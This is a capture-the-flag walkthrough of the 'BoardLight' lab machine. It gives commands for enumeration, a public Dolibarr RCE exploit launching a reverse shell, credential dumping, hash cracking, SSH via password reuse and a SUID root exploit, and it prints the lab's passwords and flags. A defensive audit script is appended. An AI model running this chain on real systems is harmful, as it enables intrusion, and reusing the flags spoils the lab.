Board Light - Walkthrough

BoardLight is an easy difficulty Linux machine that features a Dolibarr instance vulnerable to CVE-2023-30253. This vulnerability is leveraged to gain access as www-data. After enumerating and dumping the contents of the web configuration file, plaintext credentials lead to SSH access to the machine. Enumerating the system, a SUID binary related to enlightenment is identified which is vulnerable to privilege escalation via CVE-2022-37706 and can be abused to obtain a root shell.

Enumeration

We begin with an Nmap scan to identify open services:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.11 -oG allPorts

The scan reveals:

PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   open   http

A targeted scan provides more details:

sudo nmap -p22,80 -sCV 10.10.11.11 -oN targeted

  • SSH → OpenSSH 8.2p1 Ubuntu 4ubuntu0.11
  • HTTP → Apache httpd 2.4.41 (Ubuntu)

board.htb

We perform subdomain fuzzing:

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://board.htb -H "Host: FUZZ.board.htb" -fs 15949

Discovered subdomain: crm

We add the hostnames to /etc/hosts:

sudo sh -c 'echo "10.10.11.11 board.htb crm.board.htb" >> /etc/hosts'

crm.board.htb

The CRM subdomain runs Dolibarr ERP/CRM.

Foothold

Dolibarr 17.0.0 is vulnerable to authenticated RCE (CVE-2023-30253). Testing default credentials admin:admin successfully authenticates. We exploit it to gain a reverse shell:

git clone https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
python3 exploit.py http://crm.board.htb admin admin 10.10.14.10 5000

Shell obtained as www-data.

Post-Exploitation

We search for credentials in the Dolibarr configuration:

grep -ril "pass" /var/www/html/crm.board.htb | grep "conf"
cat /var/www/html/crm.board.htb/htdocs/conf/conf.php

Database credentials found:

Username        Password
dolibarrowner   serverfun2$2023!!

We connect to MySQL and extract user hashes:

mysql -u dolibarrowner -p dolibarr
SELECT login, pass_crypted FROM llx_user;
| login    | pass_crypted                                                 |
| admin    | $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96 |

We crack the bcrypt hash with hashcat:

hashcat -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

The hash cracks to the password admin, which we already know. More useful is the observation that the database password is reused: testing it against the local user larissa succeeds.

Username   Password
larissa    serverfun2$2023!!

We SSH as larissa and capture the user flag:

ssh [email protected]
cat user.txt

User flag: d3d52a4b2e7795a1a492352042889565

Privilege Escalation

We search for SUID binaries:

find / -perm -4000 2>/dev/null

The enlightenment binary is present and vulnerable to CVE-2022-37706. We exploit it:

git clone https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit
chmod +x poc.sh
./poc.sh
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)

Root shell obtained:

cat /root/root.txt

Root flag: 0874c2c63ac85bd4f81c12dc8748de78
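The chain above relies on two host weaknesses besides the Dolibarr bug: a conf.php readable by the web server account, and a SUID helper nobody was tracking. The following script is an added defensive check, not part of the original walkthrough; the Dolibarr conf path is the one shown above, and the SUID baseline file is an assumed list (one absolute path per line) that the administrator maintains.

```sh
#!/bin/sh
# Post-incident audit for the two misconfigurations used on BoardLight
# (added example, not from the walkthrough). POSIX sh; needs find, sort, grep.
#
# Usage (hypothetical paths):
#   . ./audit.sh
#   conf_readable_by_others /var/www/html/crm.board.htb/htdocs/conf/conf.php
#   unexpected_suid / /etc/suid.baseline

# conf_readable_by_others FILE
# Prints WEAK when the group- or world-read bit is set on FILE (this is what
# let www-data cat conf.php above), OK when only the owner can read it, and
# MISSING when the file does not exist.
conf_readable_by_others() {
  f=$1
  [ -f "$f" ] || { echo MISSING; return 0; }
  # -perm -004: other-read bit set; -perm -040: group-read bit set (POSIX find)
  if [ -n "$(find "$f" \( -perm -004 -o -perm -040 \) -print 2>/dev/null)" ]; then
    echo WEAK
  else
    echo OK
  fi
}

# unexpected_suid ROOT BASELINE
# Lists set-uid regular files under ROOT (same filesystem only) whose path is
# not in BASELINE. A helper that appeared after the baseline was taken, such
# as the enlightenment binary above, is printed; no output means no drift.
unexpected_suid() {
  root=$1; baseline=$2
  find "$root" -xdev -type f -perm -4000 2>/dev/null | sort |
    grep -vxF -f "$baseline" || true
}
```

Run it from cron or a config-management agent and alert on any WEAK result or any line from unexpected_suid; the `find / -perm -4000` command used above for enumeration is the same query the defender should be running against a known-good list.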